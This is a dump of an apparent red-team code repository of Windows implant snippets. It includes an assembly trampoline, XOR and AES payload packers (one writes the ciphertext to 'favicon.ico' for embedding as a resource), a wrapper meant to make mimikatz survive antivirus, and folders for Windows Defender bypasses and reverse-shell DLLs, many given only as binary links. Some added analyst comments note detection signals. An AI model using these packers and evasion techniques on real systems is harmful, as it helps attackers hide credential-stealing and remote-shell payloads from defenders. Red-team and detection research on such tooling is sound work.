%p\n",ret_addr); // get return address 27 | 28 | asm("int3; ReturnHere:;"); //ret_addr 29 | printf("Exiting implant...\n"); 30 | } 31 | 32 | 33 | // nasm -f win64 payload.asm -o payload.o 34 | // nasm -f win64 ramp.asm -o ramp.o 35 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel -------------------------------------------------------------------------------- /Cpp/clean_stacks/payload.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/payload.o -------------------------------------------------------------------------------- /Cpp/clean_stacks/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | 7 | onRamp: ; onRamp (exec_mem, return_address) // rcx, rdx 8 | mov r13, rdx ; preserve our return address 9 | push r13 ; put return_address on the stack 10 | lea r13, [rsp] ; r13 = address of the stack slot holding return_address 11 | 12 | lea r15, offRamp ; preserve offRamp address 13 | push r15 ; put r15 on the stack 14 | lea r15, [rsp] ; r15 = address of the stack slot holding the offRamp address 15 | 16 | sub rsp, 0x20 ; protect our addresses 17 | 18 | jmp rcx ; jmp to our payload 19 | 20 | offRamp: 21 | 22 | loop: 23 | pop rax ; pop value off the stack 24 | cmp rsp,r13 ; check if rsp = r13 (the slot holding return_address) 25 | jne loop ; loop if there's still garbage on the stack 26 | 27 | ret ; rsp = r13 here, so ret pops return_address and jumps to it 28 | 29 | 30 | -------------------------------------------------------------------------------- /Cpp/clean_stacks/ramp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/ramp.o -------------------------------------------------------------------------------- /Cpp/create_process/CreateProcess.cpp: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | STARTUPINFO si; 7 | si.cb = sizeof(si); //THE CB MEMBER OF STARTUPINFO SHOULD CONTAIN THE SIZE OF THE STRUCTURE TAKEN FROM THE CREATEPROCESSW DOC 8 | ZeroMemory(&si, sizeof(si)); //ZERO OUT THE MEMORY TO ENSURE THERE IS NO DATA IN THE REGION PRIOR TO USE -- NOTE(review): THIS ALSO RESETS si.cb, SET ON THE LINE ABOVE, TO 0; cb SHOULD BE ASSIGNED AFTER ZeroMemory 9 | 10 | PROCESS_INFORMATION pi; 11 | ZeroMemory(&pi, sizeof(pi));//ZERO THIS OUT TOO 12 | //NOW WE'RE READY TO CALL CREATE PROCESS 13 | 14 | BOOL success = CreateProcess( 15 | "C:\\Windows\\System32\\notepad.exe", 16 | NULL, 17 | 0, 18 | 0, 19 | FALSE, 20 | 0, 21 | NULL, 22 | "C:\\Windows\\System32", 23 | &si, 24 | &pi); 25 | 26 | if (success){ 27 | printf("Process created with PID: %d\n",pi.dwProcessId); 28 | return 0; 29 | 30 | }else{ 31 | printf("Failed to create process. Error code: %d\n", GetLastError()); 32 | return 1; 33 | } 34 | 35 | } -------------------------------------------------------------------------------- /Cpp/create_process/CreateProcess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/create_process/CreateProcess.exe -------------------------------------------------------------------------------- /Cpp/create_process/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/crypter/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpmain.cpp /EHsc /link /OUT:crypter.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/crypter/crypter.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/crypter.exe -------------------------------------------------------------------------------- /Cpp/crypter/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | // Check if enough arguments were passed 6 | if (argc < 3) { 7 | std::cerr << "Usage: " << argv[0] << " " << std::endl; 8 | return 1; 9 | } 10 | 11 | // Open the input file 12 | std::ifstream input_file(argv[1], std::ios::binary); 13 | if (!input_file) { 14 | std::cerr << "Error: Could not open input file " << argv[1] << std::endl; 15 | return 1; 16 | } 17 | 18 | // Open the output file 19 | std::ofstream output_file(argv[2], std::ios::binary); 20 | if (!output_file) { 21 | std::cerr << "Error: Could not open output file " << argv[2] << std::endl; 22 | return 1; 23 | } 24 | 25 | // XOR every input byte with a fixed one-byte key (reversible obfuscation, not cryptographic encryption) 26 | char key = 'K'; // Hard-coded single-byte XOR key; running the tool on its own output restores the input 27 | char buffer; 28 | while (input_file.read(&buffer, 1)) { 29 | buffer ^= key; 30 | output_file.write(&buffer, 1); 31 | } 32 | 33 | // Close the input and output files 34 | input_file.close(); 35 | output_file.close(); 36 | 37 | return 0; 38 | } -------------------------------------------------------------------------------- /Cpp/crypter/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/main.obj -------------------------------------------------------------------------------- /Cpp/crypter/out.txt: -------------------------------------------------------------------------------- 1 | ?.8? 
-------------------------------------------------------------------------------- /Cpp/crypter/test.txt: -------------------------------------------------------------------------------- 1 | test -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/build_the_sleigh.py: -------------------------------------------------------------------------------- 1 | print '0x90, ' * 1024000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:3000000000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/implant.exe -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! 
%s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | #open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/build_the_sleigh.py: -------------------------------------------------------------------------------- 1 | print '0x90, ' * 2048000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:300000000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/vt_results.txt: -------------------------------------------------------------------------------- 1 | https://www.virustotal.com/gui/file-analysis/OGY3Y2M5M2ZjNDkwZDZkZGMxN2Y2N2EyZmIzNDlhMjQ6MTY3MjI4NTY3Nw== -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg 
-------------------------------------------------------------------------------- /Cpp/deceiving_defender/Readme.md: -------------------------------------------------------------------------------- 1 | Collection of code snippets used to bypass Windows Defender's protections. 2 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/Readme.md: -------------------------------------------------------------------------------- 1 | Using a simple name check to bypass Windows Defender. 2 | 3 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/name_bypass/implant.exe -------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.exe 
-------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.obj -------------------------------------------------------------------------------- /Cpp/embedding_payloads/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/calc_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/calc_x64.bin -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe 
-------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_reloc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/good.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * By 0xTriboulet 3 | * "good.exe" program 4 | * 12/31/22 5 | * compile with: x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #pragma comment(lib, "user32.lib") 12 | #pragma comment(lib, "kernel32.lib") 13 | 14 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 15 | LPSTR lpCmdLine, int nCmdShow) { 16 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/good_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/good_x64.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/test.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(VOID){ 6 | getchar(); 7 | //__debugbreak(); 8 | FARPROC a = GetProcAddress(LoadLibraryA("kernel32"),"CreateThread"); 9 | //__debugbreak(); 10 | printf("address %p\n:", a); 11 | printf("Success!\n"); 12 | return 0; 13 | } -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/calc_payload_32.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/calc_payload_32.bin -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/even_better.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/even_better_ansi.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better_ansi.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * By 0xTriboulet 3 | * "good.exe" program 
4 | * 12/31/22 5 | * compile with: i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -ansi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #pragma comment(lib, "user32.lib") 12 | 13 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 14 | LPSTR lpCmdLine, int nCmdShow) { 15 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.obj -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good_no_names.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_no_names.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good_w_names.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_w_names.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/Readme.md: 
-------------------------------------------------------------------------------- 1 | All the source and binaries used to develop a survivable mimikatz executable 2 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/mimikatz.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/aesencrypt.py: --------------------------------------------------------------------------------
# Red Team Operator course code template
# payload encryption with AES
#
# author: reenz0h (twitter: @sektor7net)
#
# What the script does, as written:
#   1. reads the file named by argv[1],
#   2. pads it and encrypts it with AES-CBC under SHA-256(KEY),
#   3. writes the ciphertext to "favicon.ico" and prints the ciphertext and
#      KEY as C array initialisers.
# It relies on Python 2 byte-string semantics (chr() padding appended to the
# bytes read from the file, ord() over each byte).
#
# Analyst notes:
#   - KEY is printed in C-array form, presumably to be compiled into the
#     wrapper next to the ciphertext (confirm against the wrapper source).
#     In that case the AES layer only hides the payload from static scanning:
#     with the sample in hand, the key plus the fixed all-zero IV below are
#     enough to recover the input.
#   - KEY is random per run, so the ciphertext differs between builds and a
#     hash or byte signature of one blob will not match the next one.
#   - wrapper/resources.rc embeds favicon.ico as RCDATA. A resource that is
#     named like an icon but does not parse as an ICO file is a useful
#     triage signal.

import sys
from Crypto.Cipher import AES
from os import urandom
import hashlib

# Fresh random 16-byte secret for every run; printed at the end of the script.
KEY = urandom(16)

def pad(s):
    # PKCS#7-style padding: append n copies of chr(n), where n is the distance
    # to the next multiple of AES.block_size. Input that is already
    # block-aligned gets one full extra block.
    return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)

def aesenc(plaintext, key):

    # The AES key is the SHA-256 digest of `key` (32 bytes), not `key` itself.
    k = hashlib.sha256(key).digest()
    # Fixed all-zero IV: the only per-run randomness is KEY.
    iv = 16 * '\x00'
    plaintext = pad(plaintext)
    cipher = AES.new(k, AES.MODE_CBC, iv)

    return cipher.encrypt(bytes(plaintext))


try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = aesenc(plaintext, KEY)
# The ciphertext is stored under an icon file name; it is not an ICO image.
open("favicon.ico",'wb').write(ciphertext)
# Both arrays are printed as hex without zero padding (a zero byte prints as 0x0).
print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };')

-------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | 6 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcmimikatz.cpp /link /OUT:mimikatz.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/favicon.ico -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/mimikatz.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.obj -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.h: 
-------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.o -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.res -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/shellcode.bin -------------------------------------------------------------------------------- /Cpp/making_malware/Readme.md: -------------------------------------------------------------------------------- 1 | Source and binaries for achieving reverse shells on modern Windows systems. 
2 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/beautify.py: --------------------------------------------------------------------------------
# Copies the file named by argv[1] unchanged to "payload.out" and prints its
# bytes as a C `unsigned char payload[]` initialiser.
# Relies on Python 2 byte-string semantics (ord() over each byte read).
#
# Analyst note: no encoding is applied here. The printed array holds the input
# bytes as-is, so a program compiled with it carries the input verbatim in its
# data, and byte signatures for the input file still apply to that program.
import sys



try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


open("payload.out",'wb').write(plaintext)
# Hex values are printed without zero padding (a zero byte prints as 0x0).
print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')

-------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W2 /GS- /DNDEBUG /Tpimplantv1.cpp /link /OUT:implantv1.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implant.obj -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implantv1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.exe -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implantv1.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.obj 
-------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/xorencrypt.py: --------------------------------------------------------------------------------
# Red Team Operator course code template
# payload encryption with XOR
#
# author: reenz0h (twitter: @sektor7net)
#
# Reads the file named by argv[1], XORs it with the repeating string KEY,
# writes the result to "payload.out" and prints it as a C array initialiser.
# Relies on Python 2 byte-string semantics (ord() over each byte read).
#
# Analyst notes:
#   - KEY is a fixed printable string and the transform is deterministic, so
#     the same input always produces the same encoded bytes.
#   - Repeating-key XOR is an encoding rather than encryption: applying the
#     same key again restores the input, and whatever decodes the blob at run
#     time needs the key.
#   - Wherever the input holds a run of zero bytes, the output is the key
#     itself, repeated. That makes the key easy to spot in the encoded blob.

import sys

KEY = "WindowsSystem32"

def xor(data, key):
    # Returns `data` XORed byte by byte with `key`, repeating `key` as needed.
    # The result is built as a str, one chr() at a time.

    key = str(key)
    l = len(key)  # not used below; the loop calls len(key) again
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        output_str += chr(ord(current) ^ ord(current_key))

    return output_str

def printCiphertext(ciphertext):
    # Not called in this script; the final print below repeats this expression.
    print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')



try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


ciphertext = xor(plaintext, KEY)
open("payload.out",'wb').write(ciphertext)
print("unsigned char payload[] = ")
# Hex values are printed without zero padding (a zero byte prints as 0x0).
print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')

-------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplantv2.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implant.exe -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/implantv2.obj: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implantv2.obj -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll 4 | echo Cleaning up... 
5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverse.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.dll -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv3/Readme.md: -------------------------------------------------------------------------------- 1 | Implantv3 Main.cpp 2 | 3 | For VX-API check out: 4 | https://github.com/vxunderground/VX-API 5 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv3/x64/Release/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implant.exe -------------------------------------------------------------------------------- 